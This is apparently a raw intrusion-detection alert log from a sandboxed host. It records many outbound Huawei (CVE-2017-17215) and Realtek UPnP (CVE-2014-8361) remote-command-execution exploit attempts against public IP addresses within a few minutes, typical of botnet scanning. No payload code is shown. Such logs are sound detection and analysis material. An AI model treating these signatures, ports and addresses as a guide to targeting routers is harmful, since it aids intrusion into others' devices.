                                                07/20/24-23:05:45.414465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654037215192.168.2.14220.31.133.12
                                                07/20/24-23:05:52.545166TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5117052869192.168.2.1436.229.223.206
                                                07/20/24-23:05:46.143329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3293252869192.168.2.1496.201.129.138
                                                07/20/24-23:05:45.759654TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4942052869192.168.2.1436.229.223.206
                                                07/20/24-23:05:46.707199TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615709652869192.168.2.14132.1.16.35
                                                07/20/24-23:05:57.224112TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5540852869192.168.2.1420.239.242.93
                                                07/20/24-23:05:42.188277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5472637215192.168.2.14108.79.130.56
                                                07/20/24-23:05:39.061893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077437215192.168.2.14197.21.227.72
                                                07/20/24-23:06:00.224203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3877852869192.168.2.14145.234.43.35
                                                07/20/24-23:05:56.325754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413637215192.168.2.14197.101.153.117
                                                07/20/24-23:05:50.531553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972637215192.168.2.14157.37.32.20
                                                07/20/24-23:06:01.851987TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4377652869192.168.2.1439.96.83.57
                                                07/20/24-23:05:39.607368TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613694452869192.168.2.14203.216.179.118
                                                07/20/24-23:05:35.384826TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4114852869192.168.2.14107.226.165.86
                                                07/20/24-23:05:48.107529TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614192452869192.168.2.14110.239.167.97
                                                07/20/24-23:05:35.864699TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615685452869192.168.2.14212.160.183.244
                                                07/20/24-23:05:37.472951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5416852869192.168.2.14187.140.68.61
                                                07/20/24-23:06:08.078658TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614259452869192.168.2.149.99.224.142
                                                07/20/24-23:05:33.831807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5144237215192.168.2.1441.21.217.171
                                                07/20/24-23:06:48.642445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5794652869192.168.2.14177.203.93.50
                                                07/20/24-23:05:47.120793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576037215192.168.2.14157.190.138.68
                                                07/20/24-23:05:38.957923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919037215192.168.2.14172.45.139.106
                                                07/20/24-23:05:52.459685TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24396252869192.168.2.14222.57.120.201
                                                07/20/24-23:06:02.091054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3871052869192.168.2.1464.226.150.186
                                                07/20/24-23:05:35.891482TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4753252869192.168.2.14206.53.82.225
                                                07/20/24-23:06:13.620376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3497452869192.168.2.14204.40.227.89
                                                07/20/24-23:05:52.639265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5441252869192.168.2.14115.216.218.252
                                                07/20/24-23:06:14.472907TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613805252869192.168.2.14162.105.57.80
                                                07/20/24-23:05:36.329793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664037215192.168.2.14197.169.144.88
                                                07/20/24-23:05:45.009825TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5292652869192.168.2.14150.141.141.200
                                                07/20/24-23:05:52.697720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23969852869192.168.2.14203.201.159.16
                                                07/20/24-23:05:40.439699TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25533052869192.168.2.14152.153.83.132
                                                07/20/24-23:06:00.006350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662652869192.168.2.14210.69.210.81
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794237215192.168.2.14157.100.189.26
                                                07/20/24-23:05:37.440434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24666252869192.168.2.14157.104.97.161
                                                07/20/24-23:06:11.223856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3644452869192.168.2.14130.30.125.75
                                                07/20/24-23:05:57.132088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5676252869192.168.2.1438.177.215.154
                                                07/20/24-23:06:31.522075TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25412252869192.168.2.14185.5.149.16
                                                07/20/24-23:07:36.969912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23674852869192.168.2.14111.105.141.17
                                                07/20/24-23:05:58.662426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5656052869192.168.2.1484.76.117.61
                                                07/20/24-23:06:26.037863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5428452869192.168.2.1485.157.41.241
                                                07/20/24-23:06:01.515617TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23771652869192.168.2.14203.188.134.128
                                                07/20/24-23:06:06.402809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25788052869192.168.2.14147.116.212.99
                                                07/20/24-23:05:48.805828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881437215192.168.2.14157.29.74.228
                                                07/20/24-23:05:57.116146TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23491652869192.168.2.14182.142.59.96
                                                07/20/24-23:05:59.449442TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24103652869192.168.2.1493.254.0.231
                                                07/20/24-23:05:58.093159TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25786252869192.168.2.14102.49.228.203
                                                07/20/24-23:05:58.277784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23426052869192.168.2.14201.21.236.203
                                                07/20/24-23:06:51.309417TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615968452869192.168.2.14136.96.92.41
                                                07/20/24-23:05:56.439868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174652869192.168.2.1412.127.100.36
                                                07/20/24-23:05:40.488770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5457452869192.168.2.1434.198.48.42
                                                07/20/24-23:05:35.486669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5536052869192.168.2.14135.221.59.240
                                                07/20/24-23:05:37.556779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4111452869192.168.2.14111.8.128.237
                                                07/20/24-23:05:47.105578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731437215192.168.2.1441.23.16.189
                                                07/20/24-23:05:57.454187TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25173452869192.168.2.14162.11.26.228
                                                07/20/24-23:06:33.386710TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613454852869192.168.2.14140.249.48.165
                                                07/20/24-23:05:40.395251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23787452869192.168.2.1449.83.27.219
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763237215192.168.2.14157.81.32.84
                                                07/20/24-23:05:36.343631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527837215192.168.2.1441.16.187.35
                                                07/20/24-23:06:03.467179TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25631052869192.168.2.14202.237.8.144
                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4006637215192.168.2.14197.193.129.207
                                                07/20/24-23:05:57.544144TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24243852869192.168.2.14133.93.209.42
                                                07/20/24-23:05:40.478948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952852869192.168.2.1451.39.86.197
                                                07/20/24-23:05:45.383849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946437215192.168.2.14197.128.22.128
                                                07/20/24-23:07:34.258673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4712852869192.168.2.1432.94.211.34
                                                07/20/24-23:05:45.051106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3783452869192.168.2.1423.67.93.22
                                                07/20/24-23:05:58.093158TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5166052869192.168.2.1423.28.207.2
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261637215192.168.2.14197.91.156.105
                                                07/20/24-23:07:28.154823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5774052869192.168.2.1449.116.114.195
                                                07/20/24-23:06:19.575886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5317652869192.168.2.14124.7.34.105
                                                07/20/24-23:06:19.828183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5235452869192.168.2.14110.51.53.108
                                                07/20/24-23:07:15.422064TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569452869192.168.2.14107.134.5.14
                                                07/20/24-23:06:05.138503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5424852869192.168.2.1445.62.223.206
                                                07/20/24-23:05:57.919151TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615603052869192.168.2.14222.212.155.214
                                                07/20/24-23:06:26.174884TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25110452869192.168.2.14148.83.111.89
                                                07/20/24-23:06:12.663367TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24190452869192.168.2.1481.179.50.162
                                                07/20/24-23:06:27.467011TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615781252869192.168.2.1420.101.135.97
                                                07/20/24-23:06:38.250934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5754052869192.168.2.1459.78.95.157
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256037215192.168.2.1457.7.134.79
                                                07/20/24-23:05:59.265746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4049652869192.168.2.1418.174.57.38
                                                07/20/24-23:05:47.487816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5382252869192.168.2.1413.4.78.44
                                                07/20/24-23:05:59.058741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613391252869192.168.2.141.27.82.104
                                                07/20/24-23:05:39.773172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005037215192.168.2.145.204.127.74
                                                07/20/24-23:05:38.951134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313437215192.168.2.14101.158.73.28
                                                07/20/24-23:05:48.783693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025637215192.168.2.14157.255.56.151
                                                07/20/24-23:05:37.520621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4778452869192.168.2.14216.11.155.229
                                                07/20/24-23:05:58.968542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4993852869192.168.2.14129.7.141.158
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523837215192.168.2.14107.0.213.50
                                                07/20/24-23:06:35.414252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614434252869192.168.2.14167.66.48.216
                                                07/20/24-23:05:59.449873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5633852869192.168.2.1444.160.30.244
                                                07/20/24-23:05:39.904017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4878052869192.168.2.14129.213.65.68
                                                07/20/24-23:05:34.622609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563237215192.168.2.14157.37.121.244
                                                07/20/24-23:05:35.202225TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5546452869192.168.2.14159.94.41.117
                                                07/20/24-23:05:46.401351TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613321852869192.168.2.1498.101.208.247
                                                07/20/24-23:06:05.271056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25244252869192.168.2.14223.121.185.59
                                                07/20/24-23:06:02.874908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615261252869192.168.2.14160.151.2.40
                                                07/20/24-23:06:21.746493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4719052869192.168.2.1465.122.250.47
                                                07/20/24-23:05:36.324298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933237215192.168.2.1441.176.244.105
                                                07/20/24-23:05:39.050437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419637215192.168.2.1441.6.65.49
                                                07/20/24-23:06:05.754581TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615523052869192.168.2.142.211.159.113
                                                07/20/24-23:05:47.016775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883437215192.168.2.14210.124.66.194
                                                07/20/24-23:05:37.468656TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3624852869192.168.2.14116.132.89.76
                                                07/20/24-23:05:50.513568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261837215192.168.2.1441.42.120.251
                                                07/20/24-23:06:12.981585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5787852869192.168.2.14203.255.46.180
                                                07/20/24-23:05:48.787750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517037215192.168.2.14197.230.60.205
                                                07/20/24-23:05:57.532549TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23875452869192.168.2.149.153.76.157
                                                07/20/24-23:05:59.994984TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613397652869192.168.2.14145.10.127.230
                                                07/20/24-23:05:56.993750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5093252869192.168.2.14162.11.26.228
                                                07/20/24-23:05:45.002942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5083452869192.168.2.1499.53.49.224
                                                07/20/24-23:05:56.146643TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615372252869192.168.2.14111.19.143.182
                                                07/20/24-23:05:58.277784TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615679452869192.168.2.14216.255.100.126
                                                07/20/24-23:05:36.083178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3362052869192.168.2.14136.195.130.35
                                                07/20/24-23:06:33.467778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615314652869192.168.2.1446.101.91.51
                                                07/20/24-23:06:15.110617TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615007252869192.168.2.14198.64.2.133
                                                07/20/24-23:05:45.424850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565637215192.168.2.1441.125.192.22
                                                07/20/24-23:06:54.435154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3431052869192.168.2.14209.62.86.250
                                                07/20/24-23:05:59.272088TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615765052869192.168.2.141.179.53.254
                                                07/20/24-23:06:01.449184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3986052869192.168.2.14144.116.63.138
                                                07/20/24-23:06:17.383428TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5792452869192.168.2.1476.60.118.192
                                                07/20/24-23:06:32.610184TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613513052869192.168.2.14108.160.94.246
                                                07/20/24-23:06:01.193709TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614814652869192.168.2.14105.123.4.149
                                                07/20/24-23:06:15.818526TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25295052869192.168.2.1453.151.155.201
                                                07/20/24-23:05:50.501247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032037215192.168.2.14197.194.19.18
                                                07/20/24-23:05:42.143657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536837215192.168.2.1441.101.123.230
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810437215192.168.2.1468.192.14.242
                                                07/20/24-23:06:32.467103TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5091852869192.168.2.1488.196.89.109
                                                07/20/24-23:06:00.744106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3446852869192.168.2.14194.142.88.245
                                                07/20/24-23:05:34.657263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783037215192.168.2.14157.89.217.112
                                                07/20/24-23:05:35.336428TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4288452869192.168.2.14193.109.205.113
                                                07/20/24-23:06:03.171950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25522652869192.168.2.14109.86.100.159
                                                07/20/24-23:05:36.327823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358037215192.168.2.1479.106.105.235
                                                07/20/24-23:05:37.468656TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3426452869192.168.2.1451.84.22.246
                                                07/20/24-23:06:02.495090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5759052869192.168.2.14217.74.204.181
                                                07/20/24-23:06:05.885283TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615349452869192.168.2.1474.150.135.84
                                                07/20/24-23:06:00.005302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4957052869192.168.2.14109.36.201.204
                                                07/20/24-23:05:40.435340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4866452869192.168.2.14216.209.232.62
                                                07/20/24-23:06:34.627679TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615864052869192.168.2.14139.66.24.82
                                                07/20/24-23:05:52.728679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23910452869192.168.2.14212.158.194.40
                                                07/20/24-23:06:00.516920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25675652869192.168.2.14180.44.235.174
                                                07/20/24-23:06:02.920702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4075252869192.168.2.14193.28.16.55
                                                07/20/24-23:05:39.201580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5526652869192.168.2.1478.158.185.24
                                                07/20/24-23:06:08.051467TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615267252869192.168.2.14137.249.151.1
                                                07/20/24-23:06:12.647376TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614344652869192.168.2.1472.181.203.143
                                                07/20/24-23:06:17.645982TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24617052869192.168.2.14105.234.90.169
                                                07/20/24-23:05:59.930873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5063652869192.168.2.14205.207.74.168
                                                07/20/24-23:05:59.919897TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4535852869192.168.2.14196.190.254.156
                                                07/20/24-23:05:58.104584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613378052869192.168.2.14220.66.34.165
                                                07/20/24-23:05:59.482880TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25812252869192.168.2.14202.241.41.21
                                                07/20/24-23:05:45.988990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416637215192.168.2.1441.118.129.227
                                                07/20/24-23:06:03.387430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762837215192.168.2.14197.66.136.184
                                                07/20/24-23:05:35.974201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5513652869192.168.2.14114.225.14.65
                                                07/20/24-23:05:57.029235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25144652869192.168.2.14136.62.141.53
                                                07/20/24-23:05:57.445837TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25521052869192.168.2.1454.23.238.110
                                                07/20/24-23:06:20.681117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6018452869192.168.2.14131.102.164.83
                                                07/20/24-23:05:36.360019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4774452869192.168.2.14200.238.182.46
                                                07/20/24-23:06:01.306158TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6005252869192.168.2.14194.43.144.215
                                                07/20/24-23:05:52.513067TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25002252869192.168.2.14183.184.211.239
                                                07/20/24-23:05:52.444445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25897252869192.168.2.1419.168.69.174
                                                07/20/24-23:05:59.674473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4184652869192.168.2.1457.248.59.177
                                                07/20/24-23:05:44.357595TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613715652869192.168.2.1475.112.155.168
                                                07/20/24-23:06:51.309417TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4920052869192.168.2.14112.180.70.91
                                                07/20/24-23:05:58.802333TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4327452869192.168.2.14184.54.140.200
                                                07/20/24-23:05:40.322089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5133652869192.168.2.144.234.130.62
                                                07/20/24-23:06:14.487901TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614452869192.168.2.14221.84.139.17
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083837215192.168.2.14197.125.103.179
                                                07/20/24-23:05:36.339999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812037215192.168.2.1470.253.211.133
                                                07/20/24-23:05:56.290290TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614762852869192.168.2.14211.68.211.55
                                                07/20/24-23:06:18.564435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4627252869192.168.2.1452.159.47.88
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840237215192.168.2.1461.98.235.91
                                                07/20/24-23:05:57.469881TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3562852869192.168.2.1467.148.203.96
                                                07/20/24-23:05:38.112035TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614323052869192.168.2.14185.87.153.101
                                                07/20/24-23:06:00.561304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3320452869192.168.2.14140.82.127.22
                                                07/20/24-23:05:52.632555TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23745652869192.168.2.14125.215.149.55
                                                07/20/24-23:05:59.588014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4458852869192.168.2.1448.252.151.54
                                                07/20/24-23:05:52.535100TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23361452869192.168.2.1466.83.14.44
                                                07/20/24-23:05:47.133262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5467652869192.168.2.1499.194.98.130
                                                07/20/24-23:07:12.667310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206252869192.168.2.1476.0.97.189
